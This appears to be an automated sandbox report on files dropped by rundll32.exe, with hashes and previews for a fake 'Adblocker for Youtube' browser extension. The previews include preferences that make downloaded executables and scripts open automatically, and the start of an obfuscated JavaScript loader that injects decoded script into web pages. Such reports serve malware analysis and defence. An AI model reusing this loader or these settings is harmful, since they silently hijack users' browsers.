Preview:{. "download" : {. "always_open_pdf_externally" : true,. "directory_upgrade" : true,. "extensions_to_open" : "pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz:msi". },. "extensions" : {. "settings" : {. "ahfgeienlihckogmohjhadlkjgocpleb" : {. "active_permissions" : {. "api" : [. "management",. "system.display",. "system.storage",. "webstorePrivate",. "system.cpu",. "system.memory",. "system.network". ],. "explicit_host" : [],. "manifest_permissions" : [],. "scriptable_host" : []. },. "app_launcher_ordinal" : "t",. "commands" : {},. "content_settings" : [],. "c
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):204
Entropy (8bit):4.8508578194566825
Encrypted:false
SSDEEP:6:bk/dPe1Sq89abu1VR7U30D50ogHfJf89abu/1:4dm1SlAeFUMT+EAI1
MD5:5A56E498EACF6CEED5F1C69EDAF05441
SHA1:96EB7F2EEF6D5EEB2D164FD289A7A70777E19E48
SHA-256:C381EAC12310F44DBB7E80C12B99B536173339063C004747587A826C5CE414E4
SHA-512:D1148843FD0D313491423FB1FCFA12511080AC91191609315B5B5CD34666534BCA0BD8A6FBD12584450447E39AE058FB6FB8E666AAAC00EB4AA18985612AE0C8
Malicious:false
Preview:.{"appName":{"message":".......... ... YouTube."},"appDesc":{"message":".. ....... ..... ......? ... .......... .......... ... YouTube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):152
Entropy (8bit):4.8038077324770025
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVAVqBBVR7WHATC6Wq8vEj/EXQ3YJMWVAVIQ2gBT1n:bk/dP6GtVR7s6kv3goJXW1
MD5:9558EF405369500EC74EC48B16C67123
SHA1:7A55A51AB242AAAB70B475CA244D58435ED18CDC
SHA-256:AFBC3A7F222C6C4AAC9BB72ACB89079751F1B26BCFB622AABFF3095D35E953C0
SHA-512:2FB9B297A00D30CD36C3881416360AB4C9305B148BAE4914F13C081713BF8FD921C9E8105EC1653BCB9258078509C5F425091B17482F5A7C633195DADEC59658
Malicious:false
Preview:.{"appName":{"message":"Adblocker per Youtube."},"appDesc":{"message":"Est.s buscant v.deo adblock? Pel descarregar Adblocker per a Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):144
Entropy (8bit):4.942456752756783
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVXKd5gBBVR7WHNJcRAi2eCnngXR56WWVXKd5gBT1n:bk/dP6Gn24VR7MJcRAi3+gB56/2W1
MD5:524629E383646EE89AB2F678B4BE3FF6
SHA1:F0BDE6E032863D43AB147EFC39CAEF69FC9D7515
SHA-256:2D09BA1FD1682BE5630353AEF92E3EB7F6BF82FA6E86CF6EDB38102D2B6811E3
SHA-512:D4DFCED5F83A9E000DFA52A07E42BAD63E983E68FD9E9A32601E43F5EE4F5C0DB0050DDEC99847B5DFDF7A5DE9B32DF0DFCD5EE0F16591698B8CEBF7C57126D2
Malicious:false
Preview:.{"appName":{"message":"Adblocker pro Youtube."},"appDesc":{"message":"Hled.te video adblock? Tak.e st.hnout Adblocker pro Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):153
Entropy (8bit):4.921700724720227
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWRMgFBBVR7WHA0algFkdCg1BKS9rIHWWRMgFBT1n:bk/dP6GVVVR7NgFsV1BKS9r69f1
MD5:F013F8F66453B7BB32ADFBAB94F43265
SHA1:6792CCC65AD371F2222FD11E3B994ECEB1376F7D
SHA-256:BC000154FEA83481537A4F9DBAB369970E83CA8335E52C451D9363C2BED20F45
SHA-512:85E835A25F47AA5C222264FB3ED65BAE37E7451C86BCBC634C4F145A1C58ED369321474CBA5FA9F1B10FD09370E399C24ACBFCE6C95BD81474F360B3F3AFF5F2
Malicious:false
Preview:.{"appName":{"message":"Adblocker til Youtube."},"appDesc":{"message":"Er du p. udkig efter video adblock? S. download Adblocker til Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):157
Entropy (8bit):4.946253849862891
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDmZXizBBVR7WHWM1FaDEXgsvDM2KIEBpKGOWJFIHJKZWDmZXizL:bk/dP6GpVR7c1FCsLlKnOvHJKQ1
MD5:DE39EA44F2A12A934757A93C64251ACB
SHA1:61AFFEF1FC9FF528424F9147D6C056975092F233
SHA-256:66A7A4DE9D4A548E9109821EF598273032833B5644BF1157BF4045E9A14782B4
SHA-512:32052DFBE47177EDBE1181F91FD10FEB81EA00413D8090CDB52E048B3C605AB97AEB73B65624B4F5460DB47AF37513FCF076A2E4054C1DF3DEE21FBC2EEA6F62
Malicious:false
Preview:.{"appName":{"message":"Adblocker f.r Youtube."},"appDesc":{"message":"Sind Sie auf der Suche nach video-adblock? So laden Adblocker f.r Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):197
Entropy (8bit):4.9739986021611635
Encrypted:false
SSDEEP:6:bk/dP6GLAQhqb4VR7K6ITsfva9WlroZIAQhqbW1:4dFvIbYFE6roZIvIbW1
MD5:09A7A7CD38C78FF410EEDE8878408C74
SHA1:99D3EA931D32B960E3CEB71668C5A2184E14ADD1
SHA-256:F64C79D2C0340FDFD1355E5CF7402411E52DFD8C4E19B4F0D244A8E8DDFD64E8
SHA-512:05FBC49EA69B04175F594EB1A5EA684AA907D13C5651B9480393D75FEE7B060BE9CC83AAF908611DEB6EA8BB3862A591DF50356C21ECFC4BF6AE3142425D9BA4
Malicious:false
Preview:.{"appName":{"message":"Adblocker ... .. Youtube."},"appDesc":{"message":"....... ... ...... adblock; ...., ......... .. Adblocker ... .. Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:ASCII text, with very long lines (65536), with no line terminators
Category:dropped
Size (bytes):834804
Entropy (8bit):4.237053021969982
Encrypted:false
SSDEEP:6144:sWtlYGNPy3ymXZCfnvpn2qs7UoCheMANPCc3q6ep8ti31OXjNp:01Hp
MD5:24A0DD7E0230C673112594BF49574506
SHA1:CFFD9BD3E25B275E7DFA7C8245CE0DB3AF7AB9E8
SHA-256:59F94D4B4462DAD7695C0CF30D16A3EA9F31F19607E6301E5ED3AF3C5B046966
SHA-512:E0BD9AC0EB549E4DEF29633D7FFE65D4E003A99DB1AC866B5E658EA1D140A8DCDE5D9D1D90792BCE9FDD27AA6B80F44809D3F3D056CE014CBB2B5AD40971B014
Malicious:false
Preview:(function(){function _0x8853f7(){var _0x4267a3=function(_0x2b2cd9){var _0x4b9edf,_0x3875da;(_0x4b9edf=window['document'])&&(_0x3875da=_0x4b9edf['head']||_0x4b9edf['body']||_0x4b9edf['documentElement'])?(_0x4b9edf=_0x4b9edf['createElement']('script'),_0x2b2cd9=atob(_0x5ddcb(_0x2b2cd9)),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_1_',''),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_2_','4366A976DB28476FA26AE30CEE10D605'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_3_','Windows NT 10.0; WOW64'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_4_','false'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_6_',''),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_7_','true'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_8_','0'),_0x2b2cd9=_0x2b2cd9['replace']('_patch_from_content_5_','https://www.google.com/?h=bq2w5i6ru5np2fu3rd3eltwiyje2l6w8844g.mq7doifak'),_0x2b2cd9=new Blob([_0x2b2cd9],{'type':'text/javascript'}),_0x4b9edf['src']=URL['createObjectURL']
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):186
Entropy (8bit):4.746498904467988
Encrypted:false
SSDEEP:3:bk/rhPUHHEUQhGE+2NFV3gBBVR7WHASWFcFsidiCyW/oFBAyXpHE+2NFV3gBT1n:bk/dPMErGE+RVR7MWFc5qNFBAy5HE+j1
MD5:A14D4B287E82B0C724252D7060B6D9E9
SHA1:DA9D3DA2DF385D48F607445803F5817F635CC52D
SHA-256:1E16982FAC30651F8214B23B6D81D451CC7DBB322EB1242AE40B0B9558345152
SHA-512:1C4D1D3D658D9619A52B75BAD062A07F625078D9075AF706AA0051C5F164540C0AA4DACFB1345112AC7FC6E4D560CC1EA2023735BCF68B81BF674BC2FB8123FB
Malicious:false
Preview:.{"appName":{"message":"Bloqueador de anuncios para Youtube."},"appDesc":{"message":"Est.s buscando el video de adblock? As. que descarga bloqueador de anuncios para Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):186
Entropy (8bit):4.746498904467988
Encrypted:false
SSDEEP:3:bk/rhPUHHEUQhGE+2NFV3gBBVR7WHASWFcFsidiCyW/oFBAyXpHE+2NFV3gBT1n:bk/dPMErGE+RVR7MWFc5qNFBAy5HE+j1
MD5:A14D4B287E82B0C724252D7060B6D9E9
SHA1:DA9D3DA2DF385D48F607445803F5817F635CC52D
SHA-256:1E16982FAC30651F8214B23B6D81D451CC7DBB322EB1242AE40B0B9558345152
SHA-512:1C4D1D3D658D9619A52B75BAD062A07F625078D9075AF706AA0051C5F164540C0AA4DACFB1345112AC7FC6E4D560CC1EA2023735BCF68B81BF674BC2FB8123FB
Malicious:false
Preview:.{"appName":{"message":"Bloqueador de anuncios para Youtube."},"appDesc":{"message":"Est.s buscando el video de adblock? As. que descarga bloqueador de anuncios para Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):127
Entropy (8bit):4.783683649251908
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW8xBBVR7WHKR1FTM2eC9owxJKZW8xBT1n:bk/dP6GeRVR7TpleYERj1
MD5:E47E22D7E235CDA9AB5CE8B0F4F1E1F8
SHA1:0ED41228E67650D4F5D84397EAC564BCF9F4788F
SHA-256:D66AF121A08B3CA39E89DD2B5630C9E62772CD8D12A025D5529BCD26C9D8589A
SHA-512:3D7F5B72B73362A3E4245051B8F4AF485FFF52BAD315F5C616D2C6C035C382757A8A21157FA8F54060F6AFD39197E39CFC902E9D806A40F46D39C24825CDE30C
Malicious:false
Preview:.{"appName":{"message":"Adblocker Youtube."},"appDesc":{"message":"Otsid video adblock? Nii et lae Adblocker Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):133
Entropy (8bit):4.875948501246631
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW8xBBVR7WHA5oOeC5bxsFW8xAR1n:bk/dP6GeRVR7LoOeRlS
MD5:DFB95328C33900FC5F0943DB17BB7A7B
SHA1:C52582635A8FA23E049B60986A1A78AA3DC90FED
SHA-256:9FE90EC988C0D089C7756146124CC656A56C9336AD7049456200817E1D597E32
SHA-512:6636562113F42AD7BE7998498287F78C956E2B595AB4BBEAF40D814BC10D9226AB073DD16E165A366A9BE16E76D9B54F23C7E600A65333ACE15EA15B172971FB
Malicious:false
Preview:.{"appName":{"message":"Adblocker Youtube."},"appDesc":{"message":"Etsitk. video adblock? Joten lataa Adblocker Youtubeen.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):190
Entropy (8bit):4.840085778181825
Encrypted:false
SSDEEP:3:bk/rhPUHHEUQ1UIlgQWxBBVR7WHTsEFXGXGCzEpAOFEqDjmovLFHJKJAHIlgQWxL:bk/dPME/bgQCVR7SlfepqHDxvL9JdOgV
MD5:460291C4926F8C24D245A74A76B88155
SHA1:6944B567438ACF86CBE6A6A3519DC84822B8B21B
SHA-256:33976589FF5232B39103D8A8E474F4044258DFA30AE667B90F176FA93C7E9AD2
SHA-512:11E9F61BF62BA6F0506D7C200079F7D41ED8A2BD644624551CF03880C517ED0748105307B20D493D15DEDE7DEEB76BEB9FF11ECA6C05E4E415227CF88D978614
Malicious:false
Preview:.{"appName":{"message":"Bloqueur de pub pour Youtube."},"appDesc":{"message":"Vous .tes . la recherche pour la vid.o adblock? Afin de t.l.charger bloqueur de pub pour Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):156
Entropy (8bit):4.967518278690115
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWEGKQ2gBBVR7WHOAXACTAAhFEBknfJfTfmZWEGKQ2gBHMk6kL0Y:bk/dP6Gmd4VR74XroknfJypdEMC0Y
MD5:10461FD634DC768A6B93196B0879FD0F
SHA1:620AFFCA1A6EA63FA015783D367BB264A2DDA8D1
SHA-256:FF48B5761FE27245CD49308014EEC10BF057B395846A4E1091B13458CCD84848
SHA-512:B7E925A0DF6C5E84FE764AA2EDA44E29D1B2A6B40AFDCAD3C21055E0D6C7E4E3274503BB821D03CFF0AD76EBB09C7C0DB1DA8695DAA207191A463C149AEE8A8F
Malicious:false
Preview:.{"appName":{"message":"Adblocker a Youtube."},"appDesc":{"message":"Keres vide. adblock? .gy a let.lt.s Adblocker a Youtube.szolg.ltat.sban."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.793805282505165
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVAVqBBVR7WHWREEmiKjKFCiQpEWpKZWVAVqBT1n:bk/dP6GtVR7yEmwFXjWky1
MD5:4CF617F75C36EF8C5C566F7E9689A123
SHA1:2F8E9DA815F05E4A3F9F70B2C103DAAB3E27069E
SHA-256:2603AA798E78D7DC60EB166545436A264658F7B1B6B4B7436D367A969033B263
SHA-512:D857DBCBE5359F222B7922D784B1E795BF28D5A81A9FFEA1AB5DAF8F63408F9A3F580CC6D22DE68C267E88FDB03141D3FD85162FB1C8A9FB8C1E2562D1DE5AD2
Malicious:false
Preview:.{"appName":{"message":"Adblocker per Youtube."},"appDesc":{"message":"Stai cercando video adblock? Quindi, scaricare Adblocker per Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
